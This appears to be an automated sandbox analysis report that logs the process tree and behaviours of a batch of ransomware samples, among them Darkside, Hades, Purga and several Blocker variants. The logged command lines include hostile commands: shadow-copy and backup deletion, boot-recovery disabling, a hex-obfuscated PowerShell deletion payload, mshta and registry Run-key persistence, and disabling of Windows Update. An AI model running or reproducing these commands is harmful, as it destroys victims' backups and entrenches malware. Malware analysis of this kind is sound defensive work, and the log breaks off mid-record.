taskmgr.exepowershell.execmd.exeHEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exeHEUR-Trojan-Ransom.Win32.Blocker.vho-fad399b0261e4b9603a827c6edba8297ec5a1c8dae0f2a9a24704f73c743515d.execmd.exeTrojan-Ransom.Win32.Blocker.iejl-c5e89f11b69c341b2747cea88413225465ab655fe2b212a7a5006e5dd1eb345f.exetpvpyme.exeTrojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.execmd.exeTrojan-Ransom.Win32.Gen.zjq-7727333265591e7b27b575eacbf9d55dd5967b6c1ad6d9bb9255d158957294ad.exedescription pid Process procid_target PID 1840 wrote to memory of 4696 1840 taskmgr.exe 100 PID 1840 wrote to memory of 4696 1840 taskmgr.exe 100 PID 1120 wrote to memory of 3460 1120 powershell.exe 106 PID 1120 wrote to memory of 3460 1120 powershell.exe 106 PID 3460 wrote to memory of 4688 3460 cmd.exe 108 PID 3460 wrote to memory of 4688 3460 cmd.exe 108 PID 3460 wrote to memory of 4688 3460 cmd.exe 108 PID 3460 wrote to memory of 1872 3460 cmd.exe 109 PID 3460 wrote to memory of 1872 3460 cmd.exe 109 PID 3460 wrote to memory of 1872 3460 cmd.exe 109 PID 3460 wrote to memory of 3352 3460 cmd.exe 110 PID 3460 wrote to memory of 3352 3460 cmd.exe 110 PID 3460 wrote to memory of 3352 3460 cmd.exe 110 PID 3460 wrote to memory of 2412 3460 cmd.exe 111 PID 3460 wrote to memory of 2412 3460 cmd.exe 111 PID 3460 wrote to memory of 2412 3460 cmd.exe 111 PID 3460 wrote to memory of 3084 3460 cmd.exe 112 PID 3460 wrote to memory of 3084 3460 cmd.exe 112 PID 3460 wrote to memory of 3084 3460 cmd.exe 112 PID 3460 wrote to memory of 3512 3460 cmd.exe 115 PID 3460 wrote to memory of 3512 3460 cmd.exe 115 PID 3460 wrote to memory of 3512 3460 cmd.exe 115 PID 3084 wrote to memory of 1480 3084 HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe 116 PID 3084 wrote to memory of 1480 3084 HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe 116 PID 3084 wrote to memory of 1480 3084 HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe 116 PID 3460 wrote to memory of 5156 3460 cmd.exe 119 PID 3460 wrote to memory of 5156 3460 cmd.exe 119 PID 3460 wrote to memory of 5156 3460 cmd.exe 119 PID 3352 wrote to memory of 1676 3352 HEUR-Trojan-Ransom.Win32.Blocker.vho-fad399b0261e4b9603a827c6edba8297ec5a1c8dae0f2a9a24704f73c743515d.exe 114 PID 3352 wrote to memory of 1676 3352 HEUR-Trojan-Ransom.Win32.Blocker.vho-fad399b0261e4b9603a827c6edba8297ec5a1c8dae0f2a9a24704f73c743515d.exe 114 PID 3352 wrote to memory of 1676 3352 HEUR-Trojan-Ransom.Win32.Blocker.vho-fad399b0261e4b9603a827c6edba8297ec5a1c8dae0f2a9a24704f73c743515d.exe 114 PID 3460 wrote to memory of 1760 3460 cmd.exe 120 PID 3460 wrote to memory of 1760 3460 cmd.exe 120 PID 3460 wrote to memory of 1760 3460 cmd.exe 120 PID 1480 wrote to memory of 6280 1480 cmd.exe 121 PID 1480 wrote to memory of 6280 1480 cmd.exe 121 PID 1480 wrote to memory of 6280 1480 cmd.exe 121 PID 3460 wrote to memory of 6892 3460 cmd.exe 122 PID 3460 wrote to memory of 6892 3460 cmd.exe 122 PID 3460 wrote to memory of 6892 3460 cmd.exe 122 PID 1760 wrote to memory of 7656 1760 Trojan-Ransom.Win32.Blocker.iejl-c5e89f11b69c341b2747cea88413225465ab655fe2b212a7a5006e5dd1eb345f.exe 123 PID 1760 wrote to memory of 7656 1760 Trojan-Ransom.Win32.Blocker.iejl-c5e89f11b69c341b2747cea88413225465ab655fe2b212a7a5006e5dd1eb345f.exe 123 PID 1760 wrote to memory of 7656 1760 Trojan-Ransom.Win32.Blocker.iejl-c5e89f11b69c341b2747cea88413225465ab655fe2b212a7a5006e5dd1eb345f.exe 123 PID 3460 wrote to memory of 3952 3460 cmd.exe 125 PID 3460 wrote to memory of 3952 3460 cmd.exe 125 PID 3460 wrote to memory of 3952 3460 cmd.exe 125 PID 3460 wrote to memory of 5388 3460 cmd.exe 126 PID 3460 wrote to memory of 5388 3460 cmd.exe 126 PID 3460 wrote to memory of 6608 3460 cmd.exe 234 PID 3460 wrote to memory of 6608 3460 cmd.exe 234 PID 3460 wrote to memory of 6608 3460 cmd.exe 234 PID 3460 wrote to memory of 5584 3460 cmd.exe 131 PID 3460 wrote to memory of 5584 3460 cmd.exe 131 PID 3460 wrote to memory of 5584 3460 cmd.exe 131 PID 1676 wrote to memory of 7156 1676 tpvpyme.exe 132 PID 1676 wrote to memory of 7156 1676 tpvpyme.exe 132 PID 6608 wrote to memory of 7348 6608 Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe 133 PID 6608 wrote to memory of 7348 6608 Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe 133 PID 3460 wrote to memory of 5224 3460 cmd.exe 154 PID 3460 wrote to memory of 5224 3460 cmd.exe 154 PID 7656 wrote to memory of 6800 7656 cmd.exe 137 PID 7656 wrote to memory of 6800 7656 cmd.exe 137 PID 7656 wrote to memory of 6800 7656 cmd.exe 137 PID 5224 wrote to memory of 4048 5224 Trojan-Ransom.Win32.Gen.zjq-7727333265591e7b27b575eacbf9d55dd5967b6c1ad6d9bb9255d158957294ad.exe 138 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid Process 7572 attrib.exe 8608 attrib.exe
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00416.7z"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4808
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /12⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4696
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3460 -
C:\Users\Admin\Desktop\00416\HEUR-Trojan-Ransom.MSIL.Generic-1b46e9135a7abba77ef12257fd426d59318b73bee61b01a7d880123ec0a78557.exeHEUR-Trojan-Ransom.MSIL.Generic-1b46e9135a7abba77ef12257fd426d59318b73bee61b01a7d880123ec0a78557.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4688
-
-
C:\Users\Admin\Desktop\00416\HEUR-Trojan-Ransom.Win32.Blocker.gen-0aeebcfcadc1e2f2f95b3bbc8d1edf5dad6f10fcfdae0cadc8672c238621112e.exeHEUR-Trojan-Ransom.Win32.Blocker.gen-0aeebcfcadc1e2f2f95b3bbc8d1edf5dad6f10fcfdae0cadc8672c238621112e.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1872 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1872 -s 14644⤵
- Program crash
PID:7376
-
-
-
C:\Users\Admin\Desktop\00416\HEUR-Trojan-Ransom.Win32.Blocker.vho-fad399b0261e4b9603a827c6edba8297ec5a1c8dae0f2a9a24704f73c743515d.exeHEUR-Trojan-Ransom.Win32.Blocker.vho-fad399b0261e4b9603a827c6edba8297ec5a1c8dae0f2a9a24704f73c743515d.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3352 -
C:\Users\Admin\Desktop\00416\tpvpyme.exe"C:\Users\Admin\Desktop\00416\tpvpyme.exe"4⤵
- Modifies firewall policy service
- Modifies visiblity of hidden/system files in Explorer
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122885⤵PID:7156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00416\USB_Habilitar.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:1324 -
C:\Windows\SysWOW64\regedit.exeREGEDIT /S "C:\Users\Admin\Desktop\00416\USB_habilitar.reg6⤵
- System Location Discovery: System Language Discovery
- Runs .reg file with regedit
PID:6284
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00416\windowsUpdate.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:7556 -
C:\Windows\SysWOW64\regedit.exeREGEDIT /S "C:\Users\Admin\Desktop\00416\windowsUpdate.reg6⤵
- System Location Discovery: System Language Discovery
- Runs .reg file with regedit
PID:7296
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures5⤵
- System Location Discovery: System Language Discovery
PID:6488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update /v AUOptions /t REG_DWORD /d 1 /f5⤵
- System Location Discovery: System Language Discovery
PID:8732
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config wuauserv start= disabled5⤵
- System Location Discovery: System Language Discovery
PID:6784 -
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net stop wuauserv5⤵
- System Location Discovery: System Language Discovery
PID:8508 -
C:\Windows\SysWOW64\net.exenet stop wuauserv6⤵
- System Location Discovery: System Language Discovery
PID:7104 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv7⤵
- System Location Discovery: System Language Discovery
PID:5992
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f5⤵
- System Location Discovery: System Language Discovery
PID:6992 -
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f6⤵
- System Location Discovery: System Language Discovery
PID:4236
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f5⤵
- System Location Discovery: System Language Discovery
PID:2760 -
C:\Windows\SysWOW64\cmd.execmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f6⤵
- System Location Discovery: System Language Discovery
PID:1940 -
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f7⤵
- System Location Discovery: System Language Discovery
PID:8660
-
-
-
-
-
-
C:\Users\Admin\Desktop\00416\HEUR-Trojan-Ransom.Win32.Encoder.gen-2033f858574da1fa877ecac8e84be8fa27fb2d352f8254f8187cd305993bebdf.exeHEUR-Trojan-Ransom.Win32.Encoder.gen-2033f858574da1fa877ecac8e84be8fa27fb2d352f8254f8187cd305993bebdf.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2412
-
-
C:\Users\Admin\Desktop\00416\HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exeHEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3084 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C wmic SHADOWCOPY DELETE ; wbadmin DELETE SYSTEMSTATEBACKUP ; bcdedit.exe /set default bootstatuspolicy ignoreallfailures ; bcdedit.exe /set default recoveryenabled No4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic SHADOWCOPY DELETE ; wbadmin DELETE SYSTEMSTATEBACKUP ; bcdedit.exe /set default bootstatuspolicy ignoreallfailures ; bcdedit.exe /set default recoveryenabled No5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6280
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "powershell -command Start-Sleep -s 1 ; Remove-Item C:\Users\Admin\Desktop\00416\HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe"4⤵
- System Location Discovery: System Language Discovery
PID:8772 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command Start-Sleep -s 1 ; Remove-Item C:\Users\Admin\Desktop\00416\HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:404
-
-
-
-
C:\Users\Admin\Desktop\00416\HEUR-Trojan-Ransom.Win32.Generic-c082e6069bcaefeb04a9e3cb1c5478b7d5df82b07534367e2081e33207f61138.exeHEUR-Trojan-Ransom.Win32.Generic-c082e6069bcaefeb04a9e3cb1c5478b7d5df82b07534367e2081e33207f61138.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3512
-
-
C:\Users\Admin\Desktop\00416\HEUR-Trojan-Ransom.Win32.PornoAsset.gen-7654394bbdcc63d7ce5b825a87370e66d098e195af7b40abab5188744f94ac6e.exeHEUR-Trojan-Ransom.Win32.PornoAsset.gen-7654394bbdcc63d7ce5b825a87370e66d098e195af7b40abab5188744f94ac6e.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5156
-
-
C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Blocker.iejl-c5e89f11b69c341b2747cea88413225465ab655fe2b212a7a5006e5dd1eb345f.exeTrojan-Ransom.Win32.Blocker.iejl-c5e89f11b69c341b2747cea88413225465ab655fe2b212a7a5006e5dd1eb345f.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EN.bat" "4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:7656 -
C:\Users\Admin\AppData\Local\Temp\Install.exeInstall.exe -p123456 -dC:\Users\Admin\AppData\Local\Temp5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6800 -
C:\Users\Admin\AppData\Local\Temp\add.exe"C:\Users\Admin\AppData\Local\Temp\add.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:9096 -
C:\Users\Admin\AppData\Roaming\iexplorer.exe"C:\Users\Admin\AppData\Roaming\iexplorer.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1452
-
-
-
C:\Users\Admin\AppData\Local\Temp\SUPERAntiSpywarePro.exe"C:\Users\Admin\AppData\Local\Temp\SUPERAntiSpywarePro.exe"6⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:7324 -
C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE"C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE" -install -name:!SASCORE -display:"SAS Core Service" -description:"SUPERAntiSpyware Core Service" -pipe:sascoreservicepipe7⤵
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
PID:1704
-
-
C:\Windows\system32\REGSVR32.EXE"C:\Windows\system32\REGSVR32.EXE" /s "C:\Program Files\SUPERAntiSpyware\SASCTXMN64.DLL"7⤵
- Loads dropped DLL
- Modifies registry class
PID:9020
-
-
C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe"C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4636 -
C:\Program Files\SUPERAntiSpyware\SSUPDATE64.EXE"C:\Program Files\SUPERAntiSpyware\SSUPDATE64.EXE" C:\Users\Admin\AppData\Local\Temp\SSUC315.tmp8⤵PID:2796
-
-
C:\Windows\System32\cacls.exe"C:\Windows\System32\cacls.exe" "C:\System Volume Information" /E /G everyone:F8⤵PID:6764
-
-
C:\Program Files\SUPERAntiSpyware\sas_enum_cookies.exesas_enum_cookies.exe8⤵PID:3016
-
-
C:\Program Files\SUPERAntiSpyware\sas_enum_cookies.exesas_enum_cookies.exe8⤵PID:8328
-
-
C:\Windows\System32\cacls.exe"C:\Windows\System32\cacls.exe" "C:\System Volume Information" /E /R everyone8⤵PID:6644
-
-
C:\Windows\System32\cacls.exe"C:\Windows\System32\cacls.exe" "C:\System Volume Information" /E /G everyone:F8⤵PID:6160
-
-
C:\Program Files\SUPERAntiSpyware\sas_enum_cookies.exesas_enum_cookies.exe8⤵PID:4404
-
-
C:\Program Files\SUPERAntiSpyware\sas_enum_cookies.exesas_enum_cookies.exe8⤵PID:6836
-
-
-
-
-
-
-
C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Blocker.lckf-19205dc779799f71ecdff8dd7ec4a2a9106540d143a713e2c847e1f58266b0f3.exeTrojan-Ransom.Win32.Blocker.lckf-19205dc779799f71ecdff8dd7ec4a2a9106540d143a713e2c847e1f58266b0f3.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6892
-
-
C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Blocker.mtgl-49d359520d74f3752bb9955bb9582f4089e3a08a38eb39776d7f8a190bf14950.exeTrojan-Ransom.Win32.Blocker.mtgl-49d359520d74f3752bb9955bb9582f4089e3a08a38eb39776d7f8a190bf14950.exe3⤵
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3952
-
-
C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Cryptoff.bov-0ca614ac19a208d45527b341b495140fa5f9993748db6b2afda3dda7e9a8c602.exeTrojan-Ransom.Win32.Cryptoff.bov-0ca614ac19a208d45527b341b495140fa5f9993748db6b2afda3dda7e9a8c602.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5388
-
-
C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exeTrojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies Control Panel
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:6608 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:7348
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\Desktop\00416\TR4C0D~1.EXE >> NUL4⤵
- System Location Discovery: System Language Discovery
PID:8668
-
-
-
C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Gen.nse-25adae704fe3ee1591e751d24dfff1b17f834fac79fd9f7a7495b4753f2a1006.exeTrojan-Ransom.Win32.Gen.nse-25adae704fe3ee1591e751d24dfff1b17f834fac79fd9f7a7495b4753f2a1006.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5584 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://invite.gg/inverse4⤵PID:6680
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9651146f8,0x7ff965114708,0x7ff9651147185⤵PID:6700
-
-
-
-
C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Gen.zjq-7727333265591e7b27b575eacbf9d55dd5967b6c1ad6d9bb9255d158957294ad.exeTrojan-Ransom.Win32.Gen.zjq-7727333265591e7b27b575eacbf9d55dd5967b6c1ad6d9bb9255d158957294ad.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5224 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\194B.tmp\194C.tmp\194D.bat C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Gen.zjq-7727333265591e7b27b575eacbf9d55dd5967b6c1ad6d9bb9255d158957294ad.exe"4⤵PID:4048
-
-
-
C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Hades.g-0dfcf4d5f66310de87c2e422d7804e66279fe3e3cd6a27723225aecf214e9b00.exeTrojan-Ransom.Win32.Hades.g-0dfcf4d5f66310de87c2e422d7804e66279fe3e3cd6a27723225aecf214e9b00.exe3⤵
- Executes dropped EXE
PID:5620 -
C:\Users\Admin\AppData\Roaming\MappingsMtf\DiscoveryC:\Users\Admin\AppData\Roaming\MappingsMtf\Discovery /go4⤵PID:3204
-
C:\Windows\SYSTEM32\cmd.execmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Roaming\MappingsMtf\Discovery" & del "C:\Users\Admin\AppData\Roaming\MappingsMtf\Discovery" & rd "C:\Users\Admin\AppData\Roaming\MappingsMtf\"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:696 -
C:\Windows\system32\waitfor.exewaitfor /t 10 pause /d y6⤵PID:7856
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\AppData\Roaming\MappingsMtf\Discovery"6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Views/modifies file attributes
PID:8608
-
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Hades.g-0dfcf4d5f66310de87c2e422d7804e66279fe3e3cd6a27723225aecf214e9b00.exe" & del "C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Hades.g-0dfcf4d5f66310de87c2e422d7804e66279fe3e3cd6a27723225aecf214e9b00.exe" & rd "C:\Users\Admin\Desktop\00416\"4⤵PID:7712
-
C:\Windows\system32\waitfor.exewaitfor /t 10 pause /d y5⤵PID:6884
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Hades.g-0dfcf4d5f66310de87c2e422d7804e66279fe3e3cd6a27723225aecf214e9b00.exe"5⤵
- Views/modifies file attributes
PID:7572
-
-
-
-
C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Purga.oq-6eb879f5aaf5a72f5c2856aa612d03f5ca0a44fce9ede6968ee5f464829d4802.exeTrojan-Ransom.Win32.Purga.oq-6eb879f5aaf5a72f5c2856aa612d03f5ca0a44fce9ede6968ee5f464829d4802.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1428 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Purga.oq-6eb879f5aaf5a72f5c2856aa612d03f5ca0a44fce9ede6968ee5f464829d4802.exe" "C:\Users\Admin\AppData\Roaming\osk.exe"4⤵
- System Location Discovery: System Language Discovery
PID:7360
-
-
C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Purga.oq-6eb879f5aaf5a72f5c2856aa612d03f5ca0a44fce9ede6968ee5f464829d4802.exe"C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Purga.oq-6eb879f5aaf5a72f5c2856aa612d03f5ca0a44fce9ede6968ee5f464829d4802.exe" runas4⤵
- Checks computer location settings
- Executes dropped EXE
- Access Token Manipulation: Create Process with Token
- System Location Discovery: System Language Discovery
PID:6508 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Purga.oq-6eb879f5aaf5a72f5c2856aa612d03f5ca0a44fce9ede6968ee5f464829d4802.exe" "C:\Users\Admin\AppData\Roaming\osk.exe"5⤵
- System Location Discovery: System Language Discovery
PID:7152
-
-
C:\Users\Admin\AppData\Roaming\osk.exe"C:\Users\Admin\AppData\Roaming\osk.exe"5⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:6316 -
C:\Windows\SysWOW64\mshta.exemshta.exe "javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\NCddWiA',i);}catch(e){}},10);"6⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:1884
-
-
C:\Users\Admin\AppData\Local\Temp\$TMP$001.exeC:\Users\Admin\AppData\Local\Temp\$TMP$001.exe6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4356 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\$TMP$001.exe" "%APPDATA%\winupas.exe" & reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Update Assistant" /t REG_SZ /F /D "\"%APPDATA%\winupas.exe\" *" & "%APPDATA%\winupas.exe" *7⤵
- System Location Discovery: System Language Discovery
PID:9032 -
